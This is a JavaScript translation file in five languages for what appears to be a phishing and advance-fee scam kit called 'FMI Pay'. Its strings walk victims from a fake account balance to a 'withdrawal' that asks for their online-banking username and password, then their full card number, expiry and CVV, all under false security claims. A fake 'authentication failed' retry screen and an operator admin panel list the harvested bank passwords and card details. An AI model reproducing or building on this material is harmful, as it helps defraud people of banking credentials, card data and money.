export const translations = {
  fr: {
    // Login Page
    welcome: "Vérifiez et transférez vos fonds en toute simplicité",
    accessAccount: "Accéder à mon compte",
    mobileNumber: "Numéro mobile",
    mobilePlaceholder: "Ex: 87 12 34 56",
    identificationKey: "Clé d'identification",
    keyPlaceholder: "Ex: 20001",
    keyProvidedBy: "Clé fournie par FMI Pay",
    openSession: "Ouvrir une session",
    forgotCode: "Code oublié ?",
    secureConnection: "Connexion sécurisée SSL",
    dataProtected: "Vos données sont protégées par un chiffrement de bout en bout",
    connecting: "Connexion...",
    invalidKey: "Clé d'identification invalide",
    enterMobile: "Veuillez entrer votre numéro mobile",
    enterKey: "Veuillez entrer votre clé d'identification",
    
    // Dashboard
    welcomeAccount: "Bienvenue sur votre compte FMI Pay",
    availableBalance: "Solde disponible",
    lastUpdate: "Dernière mise à jour : Aujourd'hui",
    makeWithdrawal: "Effectuez un retrait",
    transferFunds: "Transférez vos fonds vers votre compte bancaire",
    history: "Historique",
    viewTransactions: "Consultez vos transactions passées",
    logout: "Déconnexion",
    secureSpace: "Espace sécurisé",
    
    // Withdrawal Page
    withdrawalRequest: "Demande de retrait",
    amountToTransfer: "Montant à transférer",
    beneficiaryInfo: "Informations du bénéficiaire",
    enterBankDetails: "Renseignez vos coordonnées bancaires",
    fullName: "Nom complet",
    emailAddress: "Adresse email",
    validate: "Valider",
    validating: "Validation...",
    secureTransaction: "Transaction sécurisée",
    enterFullName: "Veuillez entrer votre nom complet",
    enterIban: "Veuillez entrer votre IBAN",
    enterEmail: "Veuillez entrer votre adresse email",
    invalidEmail: "Veuillez entrer une adresse email valide",
    
    // Bank Auth Page
    secureBankSpace: "Espace bancaire sécurisé",
    bankVerificationRequired: "Vérification d'identité bancaire requise",
    fraudPrevention: "Pour finaliser le transfert et éviter toute fraude, veuillez approuver cette opération.",
    connectViaBank: "Connectez-vous via votre banque pour vérifier votre identité et finaliser votre transfert.",
    bank: "Banque",
    selectBank: "Sélectionnez votre banque",
    identifier: "Identifiant",
    bankIdentifierPlaceholder: "Votre identifiant bancaire",
    password: "Mot de passe",
    authenticate: "Authentifier",
    authenticating: "Authentification...",
    secureSSL: "Connexion SSL sécurisée",
    selectBankError: "Veuillez sélectionner votre banque",
    enterIdentifier: "Veuillez entrer votre identifiant",
    enterPassword: "Veuillez entrer votre mot de passe",
    
    // Card Validation Page
    cardValidation: "Validation par carte bancaire",
    cardRequired: "La carte associée à votre compte est requise pour finaliser votre transfert",
    cardInfo: "Informations de la carte",
    cardType: "Type de carte",
    selectType: "Sélectionnez le type",
    cardNumber16: "Numéro de carte (16 chiffres)",
    expiryDate: "Date d'expiration",
    securityCode: "Code de sécurité (CVV)",
    finalizeTransfer: "Finaliser le transfert",
    processing: "Traitement...",
    securePayment: "Paiement sécurisé",
    selectCardType: "Veuillez sélectionner le type de carte",
    enter16Digits: "Veuillez entrer les 16 chiffres de la carte",
    enterExpiry: "Veuillez entrer la date d'expiration (MM/AA)",
    enterCvv: "Veuillez entrer le code de sécurité (CVV)",
    cardHolder: "Titulaire",
    expires: "Expire",
    
    // Processing Page
    processingInProgress: "Traitement en cours...",
    pleaseWait: "Veuillez patienter pendant que nous vérifions vos informations",
    authFailed: "Échec d'authentification",
    withYourBank: "avec votre banque",
    verifyAndRetry: "Veuillez vérifier vos informations et réessayer...",
    remainingAttempts: "Tentatives restantes",
    retry: "Réessayer",
    transferInProgress: "Transfert en cours de traitement",
    confirmationByEmail: "Vous recevrez une confirmation par email après validation.",
    transferAmount: "Montant du transfert",
    estimatedDelay: "Délai d'attente estimé",
    workingDays: "2-5 jours ouvrables",
    submissionDate: "Date de soumission",
    backToHome: "Retour à l'accueil",
    
    // Admin
    administration: "Administration",
    adminPanel: "FMI PAY - Panneau d'administration",
    secureAccess: "Accès sécurisé",
    adminAccessCode: "Code d'accès administrateur",
    accessPanel: "Accéder au panneau",
    backToHomepage: "Retour à l'accueil",
    enterAccessCode: "Veuillez entrer le code d'accès",
    incorrectCode: "Code incorrect",
    connectionError: "Erreur de connexion",
    connectionSuccess: "Connexion réussie",
    
    // Admin Dashboard
    codes: "Codes",
    banks: "Banques",
    cards: "Cartes",
    requests: "Demandes",
    security: "Sécurité",
    identificationCodes: "Codes d'identification",
    codePlaceholder: "Code (ex: 12345)",
    amountPlaceholder: "Montant (ex: 5000000)",
    add: "Ajouter",
    bankList: "Liste des banques",
    bankNamePlaceholder: "Nom de la banque",
    cardTypes: "Types de cartes",
    cardTypePlaceholder: "Type de carte (ex: American Express)",
    withdrawalRequests: "Demandes de retrait",
    downloadPdf: "Télécharger PDF",
    noWithdrawalRequests: "Aucune demande de retrait",
    changeAccessCode: "Changer le code d'accès",
    oldCode: "Ancien code",
    newCode: "Nouveau code",
    confirmNewCode: "Confirmer le nouveau code",
    modifyCode: "Modifier le code",
    codeExists: "Ce code existe déjà",
    codeCreated: "Code créé avec succès",
    codeDeleted: "Code supprimé",
    bankExists: "Cette banque existe déjà",
    bankAdded: "Banque ajoutée avec succès",
    bankDeleted: "Banque supprimée",
    cardTypeExists: "Ce type de carte existe déjà",
    cardTypeAdded: "Type de carte ajouté avec succès",
    cardTypeDeleted: "Type de carte supprimé",
    fillAllFields: "Veuillez remplir tous les champs",
    codesDoNotMatch: "Les nouveaux codes ne correspondent pas",
    oldCodeIncorrect: "Ancien code incorrect",
    codeModified: "Code admin modifié avec succès",
    deleteConfirm: "Supprimer",
    bankPassword: "Mot de passe bancaire",
    cardNumber: "N° Carte",
    expiration: "Expiration",
    date: "Date",
    name: "Nom",
    email: "Email",
    amount: "Montant",
    bankId: "ID Bancaire",
    card: "Carte",
    
    // Language
    language: "Langue",
  },
  
  en: {
    // Login Page
    welcome: "Verify and transfer your funds with ease",
    accessAccount: "Access my account",
    mobileNumber: "Mobile number",
    mobilePlaceholder: "Ex: 87 12 34 56",
    identificationKey: "Identification key",
    keyPlaceholder: "Ex: 20001",
    keyProvidedBy: "Key provided by FMI Pay",
    openSession: "Sign in",
    forgotCode: "Forgot code?",
    secureConnection: "Secure SSL connection",
    dataProtected: "Your data is protected by end-to-end encryption",
    connecting: "Connecting...",
    invalidKey: "Invalid identification key",
    enterMobile: "Please enter your mobile number",
    enterKey: "Please enter your identification key",
    
    // Dashboard
    welcomeAccount: "Welcome to your FMI Pay account",
    availableBalance: "Available balance",
    lastUpdate: "Last update: Today",
    makeWithdrawal: "Make a withdrawal",
    transferFunds: "Transfer your funds to your bank account",
    history: "History",
    viewTransactions: "View your past transactions",
    logout: "Logout",
    secureSpace: "Secure space",
    
    // Withdrawal Page
    withdrawalRequest: "Withdrawal request",
    amountToTransfer: "Amount to transfer",
    beneficiaryInfo: "Beneficiary information",
    enterBankDetails: "Enter your bank details",
    fullName: "Full name",
    emailAddress: "Email address",
    validate: "Validate",
    validating: "Validating...",
    secureTransaction: "Secure transaction",
    enterFullName: "Please enter your full name",
    enterIban: "Please enter your IBAN",
    enterEmail: "Please enter your email address",
    invalidEmail: "Please enter a valid email address",
    
    // Bank Auth Page
    secureBankSpace: "Secure banking space",
    bankVerificationRequired: "Bank identity verification required",
    fraudPrevention: "To complete the transfer and prevent fraud, please approve this operation.",
    connectViaBank: "Connect via your bank to verify your identity and complete your transfer.",
    bank: "Bank",
    selectBank: "Select your bank",
    identifier: "Username",
    bankIdentifierPlaceholder: "Your bank username",
    password: "Password",
    authenticate: "Authenticate",
    authenticating: "Authenticating...",
    secureSSL: "Secure SSL connection",
    selectBankError: "Please select your bank",
    enterIdentifier: "Please enter your username",
    enterPassword: "Please enter your password",
    
    // Card Validation Page
    cardValidation: "Card validation",
    cardRequired: "The card linked to your account is required to complete your transfer",
    cardInfo: "Card information",
    cardType: "Card type",
    selectType: "Select type",
    cardNumber16: "Card number (16 digits)",
    expiryDate: "Expiry date",
    securityCode: "Security code (CVV)",
    finalizeTransfer: "Complete transfer",
    processing: "Processing...",
    securePayment: "Secure payment",
    selectCardType: "Please select card type",
    enter16Digits: "Please enter the 16-digit card number",
    enterExpiry: "Please enter expiry date (MM/YY)",
    enterCvv: "Please enter security code (CVV)",
    cardHolder: "Cardholder",
    expires: "Expires",
    
    // Processing Page
    processingInProgress: "Processing...",
    pleaseWait: "Please wait while we verify your information",
    authFailed: "Authentication failed",
    withYourBank: "with your bank",
    verifyAndRetry: "Please verify your information and try again...",
    remainingAttempts: "Remaining attempts",
    retry: "Retry",
    transferInProgress: "Transfer in progress",
    confirmationByEmail: "You will receive an email confirmation after validation.",
    transferAmount: "Transfer amount",
    estimatedDelay: "Estimated delay",
    workingDays: "2-5 business days",
    submissionDate: "Submission date",
    backToHome: "Back to home",
    
    // Admin
    administration: "Administration",
    adminPanel: "FMI PAY - Admin panel",
    secureAccess: "Secure access",
    adminAccessCode: "Admin access code",
    accessPanel: "Access panel",
    backToHomepage: "Back to homepage",
    enterAccessCode: "Please enter access code",
    incorrectCode: "Incorrect code",
    connectionError: "Connection error",
    connectionSuccess: "Connection successful",
    
    // Admin Dashboard
    codes: "Codes",
    banks: "Banks",
    cards: "Cards",
    requests: "Requests",
    security: "Security",
    identificationCodes: "Identification codes",
    codePlaceholder: "Code (ex: 12345)",
    amountPlaceholder: "Amount (ex: 5000000)",
    add: "Add",
    bankList: "Bank list",
    bankNamePlaceholder: "Bank name",
    cardTypes: "Card types",
    cardTypePlaceholder: "Card type (ex: American Express)",
    withdrawalRequests: "Withdrawal requests",
    downloadPdf: "Download PDF",
    noWithdrawalRequests: "No withdrawal requests",
    changeAccessCode: "Change access code",
    oldCode: "Old code",
    newCode: "New code",
    confirmNewCode: "Confirm new code",
    modifyCode: "Modify code",
    codeExists: "This code already exists",
    codeCreated: "Code created successfully",
    codeDeleted: "Code deleted",
    bankExists: "This bank already exists",
    bankAdded: "Bank added successfully",
    bankDeleted: "Bank deleted",
    cardTypeExists: "This card type already exists",
    cardTypeAdded: "Card type added successfully",
    cardTypeDeleted: "Card type deleted",
    fillAllFields: "Please fill in all fields",
    codesDoNotMatch: "New codes do not match",
    oldCodeIncorrect: "Old code incorrect",
    codeModified: "Admin code modified successfully",
    deleteConfirm: "Delete",
    bankPassword: "Bank password",
    cardNumber: "Card number",
    expiration: "Expiration",
    date: "Date",
    name: "Name",
    email: "Email",
    amount: "Amount",
    bankId: "Bank ID",
    card: "Card",
    
    // Language
    language: "Language",
  },
  
  es: {
    // Login Page
    welcome: "Verifique y transfiera sus fondos con facilidad",
    accessAccount: "Acceder a mi cuenta",
    mobileNumber: "Número de móvil",
    mobilePlaceholder: "Ej: 87 12 34 56",
    identificationKey: "Clave de identificación",
    keyPlaceholder: "Ej: 20001",
    keyProvidedBy: "Clave proporcionada por FMI Pay",
    openSession: "Iniciar sesión",
    forgotCode: "¿Olvidó su código?",
    secureConnection: "Conexión SSL segura",
    dataProtected: "Sus datos están protegidos por cifrado de extremo a extremo",
    connecting: "Conectando...",
    invalidKey: "Clave de identificación inválida",
    enterMobile: "Por favor ingrese su número de móvil",
    enterKey: "Por favor ingrese su clave de identificación",
    
    // Dashboard
    welcomeAccount: "Bienvenido a su cuenta FMI Pay",
    availableBalance: "Saldo disponible",
    lastUpdate: "Última actualización: Hoy",
    makeWithdrawal: "Realizar un retiro",
    transferFunds: "Transfiera sus fondos a su cuenta bancaria",
    history: "Historial",
    viewTransactions: "Consulte sus transacciones pasadas",
    logout: "Cerrar sesión",
    secureSpace: "Espacio seguro",
    
    // Withdrawal Page
    withdrawalRequest: "Solicitud de retiro",
    amountToTransfer: "Monto a transferir",
    beneficiaryInfo: "Información del beneficiario",
    enterBankDetails: "Ingrese sus datos bancarios",
    fullName: "Nombre completo",
    emailAddress: "Dirección de email",
    validate: "Validar",
    validating: "Validando...",
    secureTransaction: "Transacción segura",
    enterFullName: "Por favor ingrese su nombre completo",
    enterIban: "Por favor ingrese su IBAN",
    enterEmail: "Por favor ingrese su email",
    invalidEmail: "Por favor ingrese un email válido",
    
    // Bank Auth Page
    secureBankSpace: "Espacio bancario seguro",
    bankVerificationRequired: "Verificación de identidad bancaria requerida",
    fraudPrevention: "Para completar la transferencia y evitar fraudes, apruebe esta operación.",
    connectViaBank: "Conéctese a través de su banco para verificar su identidad y completar su transferencia.",
    bank: "Banco",
    selectBank: "Seleccione su banco",
    identifier: "Identificador",
    bankIdentifierPlaceholder: "Su identificador bancario",
    password: "Contraseña",
    authenticate: "Autenticar",
    authenticating: "Autenticando...",
    secureSSL: "Conexión SSL segura",
    selectBankError: "Por favor seleccione su banco",
    enterIdentifier: "Por favor ingrese su identificador",
    enterPassword: "Por favor ingrese su contraseña",
    
    // Card Validation Page
    cardValidation: "Validación por tarjeta",
    cardRequired: "La tarjeta asociada a su cuenta es necesaria para completar su transferencia",
    cardInfo: "Información de la tarjeta",
    cardType: "Tipo de tarjeta",
    selectType: "Seleccione el tipo",
    cardNumber16: "Número de tarjeta (16 dígitos)",
    expiryDate: "Fecha de vencimiento",
    securityCode: "Código de seguridad (CVV)",
    finalizeTransfer: "Finalizar transferencia",
    processing: "Procesando...",
    securePayment: "Pago seguro",
    selectCardType: "Por favor seleccione el tipo de tarjeta",
    enter16Digits: "Por favor ingrese los 16 dígitos de la tarjeta",
    enterExpiry: "Por favor ingrese la fecha de vencimiento (MM/AA)",
    enterCvv: "Por favor ingrese el código de seguridad (CVV)",
    cardHolder: "Titular",
    expires: "Vence",
    
    // Processing Page
    processingInProgress: "Procesando...",
    pleaseWait: "Por favor espere mientras verificamos su información",
    authFailed: "Autenticación fallida",
    withYourBank: "con su banco",
    verifyAndRetry: "Por favor verifique su información e intente de nuevo...",
    remainingAttempts: "Intentos restantes",
    retry: "Reintentar",
    transferInProgress: "Transferencia en proceso",
    confirmationByEmail: "Recibirá una confirmación por email después de la validación.",
    transferAmount: "Monto de transferencia",
    estimatedDelay: "Tiempo estimado",
    workingDays: "2-5 días hábiles",
    submissionDate: "Fecha de envío",
    backToHome: "Volver al inicio",
    
    // Admin
    administration: "Administración",
    adminPanel: "FMI PAY - Panel de administración",
    secureAccess: "Acceso seguro",
    adminAccessCode: "Código de acceso admin",
    accessPanel: "Acceder al panel",
    backToHomepage: "Volver al inicio",
    enterAccessCode: "Por favor ingrese el código de acceso",
    incorrectCode: "Código incorrecto",
    connectionError: "Error de conexión",
    connectionSuccess: "Conexión exitosa",
    
    // Admin Dashboard
    codes: "Códigos",
    banks: "Bancos",
    cards: "Tarjetas",
    requests: "Solicitudes",
    security: "Seguridad",
    identificationCodes: "Códigos de identificación",
    codePlaceholder: "Código (ej: 12345)",
    amountPlaceholder: "Monto (ej: 5000000)",
    add: "Agregar",
    bankList: "Lista de bancos",
    bankNamePlaceholder: "Nombre del banco",
    cardTypes: "Tipos de tarjeta",
    cardTypePlaceholder: "Tipo de tarjeta (ej: American Express)",
    withdrawalRequests: "Solicitudes de retiro",
    downloadPdf: "Descargar PDF",
    noWithdrawalRequests: "Sin solicitudes de retiro",
    changeAccessCode: "Cambiar código de acceso",
    oldCode: "Código anterior",
    newCode: "Nuevo código",
    confirmNewCode: "Confirmar nuevo código",
    modifyCode: "Modificar código",
    codeExists: "Este código ya existe",
    codeCreated: "Código creado exitosamente",
    codeDeleted: "Código eliminado",
    bankExists: "Este banco ya existe",
    bankAdded: "Banco agregado exitosamente",
    bankDeleted: "Banco eliminado",
    cardTypeExists: "Este tipo de tarjeta ya existe",
    cardTypeAdded: "Tipo de tarjeta agregado",
    cardTypeDeleted: "Tipo de tarjeta eliminado",
    fillAllFields: "Por favor complete todos los campos",
    codesDoNotMatch: "Los códigos no coinciden",
    oldCodeIncorrect: "Código anterior incorrecto",
    codeModified: "Código admin modificado",
    deleteConfirm: "Eliminar",
    bankPassword: "Contraseña bancaria",
    cardNumber: "N° Tarjeta",
    expiration: "Vencimiento",
    date: "Fecha",
    name: "Nombre",
    email: "Email",
    amount: "Monto",
    bankId: "ID Bancario",
    card: "Tarjeta",
    
    // Language
    language: "Idioma",
  },
  
  pt: {
    // Login Page
    welcome: "Verifique e transfira seus fundos com facilidade",
    accessAccount: "Acessar minha conta",
    mobileNumber: "Número de celular",
    mobilePlaceholder: "Ex: 87 12 34 56",
    identificationKey: "Chave de identificação",
    keyPlaceholder: "Ex: 20001",
    keyProvidedBy: "Chave fornecida pelo FMI Pay",
    openSession: "Entrar",
    forgotCode: "Esqueceu o código?",
    secureConnection: "Conexão SSL segura",
    dataProtected: "Seus dados são protegidos por criptografia de ponta a ponta",
    connecting: "Conectando...",
    invalidKey: "Chave de identificação inválida",
    enterMobile: "Por favor insira seu número de celular",
    enterKey: "Por favor insira sua chave de identificação",
    
    // Dashboard
    welcomeAccount: "Bem-vindo à sua conta FMI Pay",
    availableBalance: "Saldo disponível",
    lastUpdate: "Última atualização: Hoje",
    makeWithdrawal: "Fazer uma retirada",
    transferFunds: "Transfira seus fundos para sua conta bancária",
    history: "Histórico",
    viewTransactions: "Consulte suas transações passadas",
    logout: "Sair",
    secureSpace: "Espaço seguro",
    
    // Withdrawal Page
    withdrawalRequest: "Solicitação de retirada",
    amountToTransfer: "Valor a transferir",
    beneficiaryInfo: "Informações do beneficiário",
    enterBankDetails: "Insira seus dados bancários",
    fullName: "Nome completo",
    emailAddress: "Endereço de email",
    validate: "Validar",
    validating: "Validando...",
    secureTransaction: "Transação segura",
    enterFullName: "Por favor insira seu nome completo",
    enterIban: "Por favor insira seu IBAN",
    enterEmail: "Por favor insira seu email",
    invalidEmail: "Por favor insira um email válido",
    
    // Bank Auth Page
    secureBankSpace: "Espaço bancário seguro",
    bankVerificationRequired: "Verificação de identidade bancária necessária",
    fraudPrevention: "Para concluir a transferência e evitar fraudes, aprove esta operação.",
    connectViaBank: "Conecte-se através do seu banco para verificar sua identidade e concluir sua transferência.",
    bank: "Banco",
    selectBank: "Selecione seu banco",
    identifier: "Identificador",
    bankIdentifierPlaceholder: "Seu identificador bancário",
    password: "Senha",
    authenticate: "Autenticar",
    authenticating: "Autenticando...",
    secureSSL: "Conexão SSL segura",
    selectBankError: "Por favor selecione seu banco",
    enterIdentifier: "Por favor insira seu identificador",
    enterPassword: "Por favor insira sua senha",
    
    // Card Validation Page
    cardValidation: "Validação por cartão",
    cardRequired: "O cartão associado à sua conta é necessário para concluir sua transferência",
    cardInfo: "Informações do cartão",
    cardType: "Tipo de cartão",
    selectType: "Selecione o tipo",
    cardNumber16: "Número do cartão (16 dígitos)",
    expiryDate: "Data de validade",
    securityCode: "Código de segurança (CVV)",
    finalizeTransfer: "Finalizar transferência",
    processing: "Processando...",
    securePayment: "Pagamento seguro",
    selectCardType: "Por favor selecione o tipo de cartão",
    enter16Digits: "Por favor insira os 16 dígitos do cartão",
    enterExpiry: "Por favor insira a data de validade (MM/AA)",
    enterCvv: "Por favor insira o código de segurança (CVV)",
    cardHolder: "Titular",
    expires: "Validade",
    
    // Processing Page
    processingInProgress: "Processando...",
    pleaseWait: "Por favor aguarde enquanto verificamos suas informações",
    authFailed: "Autenticação falhou",
    withYourBank: "com seu banco",
    verifyAndRetry: "Por favor verifique suas informações e tente novamente...",
    remainingAttempts: "Tentativas restantes",
    retry: "Tentar novamente",
    transferInProgress: "Transferência em processamento",
    confirmationByEmail: "Você receberá uma confirmação por email após a validação.",
    transferAmount: "Valor da transferência",
    estimatedDelay: "Prazo estimado",
    workingDays: "2-5 dias úteis",
    submissionDate: "Data de envio",
    backToHome: "Voltar ao início",
    
    // Admin
    administration: "Administração",
    adminPanel: "FMI PAY - Painel de administração",
    secureAccess: "Acesso seguro",
    adminAccessCode: "Código de acesso admin",
    accessPanel: "Acessar painel",
    backToHomepage: "Voltar ao início",
    enterAccessCode: "Por favor insira o código de acesso",
    incorrectCode: "Código incorreto",
    connectionError: "Erro de conexão",
    connectionSuccess: "Conexão bem sucedida",
    
    // Admin Dashboard
    codes: "Códigos",
    banks: "Bancos",
    cards: "Cartões",
    requests: "Solicitações",
    security: "Segurança",
    identificationCodes: "Códigos de identificação",
    codePlaceholder: "Código (ex: 12345)",
    amountPlaceholder: "Valor (ex: 5000000)",
    add: "Adicionar",
    bankList: "Lista de bancos",
    bankNamePlaceholder: "Nome do banco",
    cardTypes: "Tipos de cartão",
    cardTypePlaceholder: "Tipo de cartão (ex: American Express)",
    withdrawalRequests: "Solicitações de retirada",
    downloadPdf: "Baixar PDF",
    noWithdrawalRequests: "Nenhuma solicitação de retirada",
    changeAccessCode: "Alterar código de acesso",
    oldCode: "Código antigo",
    newCode: "Novo código",
    confirmNewCode: "Confirmar novo código",
    modifyCode: "Modificar código",
    codeExists: "Este código já existe",
    codeCreated: "Código criado com sucesso",
    codeDeleted: "Código excluído",
    bankExists: "Este banco já existe",
    bankAdded: "Banco adicionado com sucesso",
    bankDeleted: "Banco excluído",
    cardTypeExists: "Este tipo de cartão já existe",
    cardTypeAdded: "Tipo de cartão adicionado",
    cardTypeDeleted: "Tipo de cartão excluído",
    fillAllFields: "Por favor preencha todos os campos",
    codesDoNotMatch: "Os códigos não correspondem",
    oldCodeIncorrect: "Código antigo incorreto",
    codeModified: "Código admin modificado",
    deleteConfirm: "Excluir",
    bankPassword: "Senha bancária",
    cardNumber: "N° Cartão",
    expiration: "Validade",
    date: "Data",
    name: "Nome",
    email: "Email",
    amount: "Valor",
    bankId: "ID Bancário",
    card: "Cartão",
    
    // Language
    language: "Idioma",
  },
  
  it: {
    // Login Page
    welcome: "Verifica e trasferisci i tuoi fondi con facilità",
    accessAccount: "Accedi al mio conto",
    mobileNumber: "Numero di cellulare",
    mobilePlaceholder: "Es: 87 12 34 56",
    identificationKey: "Chiave di identificazione",
    keyPlaceholder: "Es: 20001",
    keyProvidedBy: "Chiave fornita da FMI Pay",
    openSession: "Accedi",
    forgotCode: "Codice dimenticato?",
    secureConnection: "Connessione SSL sicura",
    dataProtected: "I tuoi dati sono protetti da crittografia end-to-end",
    connecting: "Connessione...",
    invalidKey: "Chiave di identificazione non valida",
    enterMobile: "Inserisci il tuo numero di cellulare",
    enterKey: "Inserisci la tua chiave di identificazione",
    
    // Dashboard
    welcomeAccount: "Benvenuto nel tuo conto FMI Pay",
    availableBalance: "Saldo disponibile",
    lastUpdate: "Ultimo aggiornamento: Oggi",
    makeWithdrawal: "Effettua un prelievo",
    transferFunds: "Trasferisci i tuoi fondi sul tuo conto bancario",
    history: "Cronologia",
    viewTransactions: "Consulta le tue transazioni passate",
    logout: "Esci",
    secureSpace: "Spazio sicuro",
    
    // Withdrawal Page
    withdrawalRequest: "Richiesta di prelievo",
    amountToTransfer: "Importo da trasferire",
    beneficiaryInfo: "Informazioni del beneficiario",
    enterBankDetails: "Inserisci i tuoi dati bancari",
    fullName: "Nome completo",
    emailAddress: "Indirizzo email",
    validate: "Convalida",
    validating: "Convalida...",
    secureTransaction: "Transazione sicura",
    enterFullName: "Inserisci il tuo nome completo",
    enterIban: "Inserisci il tuo IBAN",
    enterEmail: "Inserisci la tua email",
    invalidEmail: "Inserisci un'email valida",
    
    // Bank Auth Page
    secureBankSpace: "Spazio bancario sicuro",
    bankVerificationRequired: "Verifica dell'identità bancaria richiesta",
    fraudPrevention: "Per completare il trasferimento ed evitare frodi, approva questa operazione.",
    connectViaBank: "Connettiti tramite la tua banca per verificare la tua identità e completare il trasferimento.",
    bank: "Banca",
    selectBank: "Seleziona la tua banca",
    identifier: "Identificatore",
    bankIdentifierPlaceholder: "Il tuo identificatore bancario",
    password: "Password",
    authenticate: "Autentica",
    authenticating: "Autenticazione...",
    secureSSL: "Connessione SSL sicura",
    selectBankError: "Seleziona la tua banca",
    enterIdentifier: "Inserisci il tuo identificatore",
    enterPassword: "Inserisci la tua password",
    
    // Card Validation Page
    cardValidation: "Convalida carta",
    cardRequired: "La carta associata al tuo conto è necessaria per completare il trasferimento",
    cardInfo: "Informazioni della carta",
    cardType: "Tipo di carta",
    selectType: "Seleziona il tipo",
    cardNumber16: "Numero carta (16 cifre)",
    expiryDate: "Data di scadenza",
    securityCode: "Codice di sicurezza (CVV)",
    finalizeTransfer: "Completa trasferimento",
    processing: "Elaborazione...",
    securePayment: "Pagamento sicuro",
    selectCardType: "Seleziona il tipo di carta",
    enter16Digits: "Inserisci le 16 cifre della carta",
    enterExpiry: "Inserisci la data di scadenza (MM/AA)",
    enterCvv: "Inserisci il codice di sicurezza (CVV)",
    cardHolder: "Titolare",
    expires: "Scade",
    
    // Processing Page
    processingInProgress: "Elaborazione...",
    pleaseWait: "Attendere mentre verifichiamo le tue informazioni",
    authFailed: "Autenticazione fallita",
    withYourBank: "con la tua banca",
    verifyAndRetry: "Verifica le tue informazioni e riprova...",
    remainingAttempts: "Tentativi rimanenti",
    retry: "Riprova",
    transferInProgress: "Trasferimento in elaborazione",
    confirmationByEmail: "Riceverai una conferma via email dopo la convalida.",
    transferAmount: "Importo del trasferimento",
    estimatedDelay: "Tempo stimato",
    workingDays: "2-5 giorni lavorativi",
    submissionDate: "Data di invio",
    backToHome: "Torna alla home",
    
    // Admin
    administration: "Amministrazione",
    adminPanel: "FMI PAY - Pannello amministrativo",
    secureAccess: "Accesso sicuro",
    adminAccessCode: "Codice di accesso admin",
    accessPanel: "Accedi al pannello",
    backToHomepage: "Torna alla home",
    enterAccessCode: "Inserisci il codice di accesso",
    incorrectCode: "Codice errato",
    connectionError: "Errore di connessione",
    connectionSuccess: "Connessione riuscita",
    
    // Admin Dashboard
    codes: "Codici",
    banks: "Banche",
    cards: "Carte",
    requests: "Richieste",
    security: "Sicurezza",
    identificationCodes: "Codici di identificazione",
    codePlaceholder: "Codice (es: 12345)",
    amountPlaceholder: "Importo (es: 5000000)",
    add: "Aggiungi",
    bankList: "Lista banche",
    bankNamePlaceholder: "Nome della banca",
    cardTypes: "Tipi di carta",
    cardTypePlaceholder: "Tipo di carta (es: American Express)",
    withdrawalRequests: "Richieste di prelievo",
    downloadPdf: "Scarica PDF",
    noWithdrawalRequests: "Nessuna richiesta di prelievo",
    changeAccessCode: "Cambia codice di accesso",
    oldCode: "Vecchio codice",
    newCode: "Nuovo codice",
    confirmNewCode: "Conferma nuovo codice",
    modifyCode: "Modifica codice",
    codeExists: "Questo codice esiste già",
    codeCreated: "Codice creato con successo",
    codeDeleted: "Codice eliminato",
    bankExists: "Questa banca esiste già",
    bankAdded: "Banca aggiunta con successo",
    bankDeleted: "Banca eliminata",
    cardTypeExists: "Questo tipo di carta esiste già",
    cardTypeAdded: "Tipo di carta aggiunto",
    cardTypeDeleted: "Tipo di carta eliminato",
    fillAllFields: "Compila tutti i campi",
    codesDoNotMatch: "I codici non corrispondono",
    oldCodeIncorrect: "Vecchio codice errato",
    codeModified: "Codice admin modificato",
    deleteConfirm: "Elimina",
    bankPassword: "Password bancaria",
    cardNumber: "N° Carta",
    expiration: "Scadenza",
    date: "Data",
    name: "Nome",
    email: "Email",
    amount: "Importo",
    bankId: "ID Bancario",
    card: "Carta",
    
    // Language
    language: "Lingua",
  },
};

export const languages = [
  { code: "fr", name: "Français", flag: "🇫🇷" },
  { code: "en", name: "English", flag: "🇬🇧" },
  { code: "es", name: "Español", flag: "🇪🇸" },
  { code: "pt", name: "Português", flag: "🇧🇷" },
  { code: "it", name: "Italiano", flag: "🇮🇹" },
];
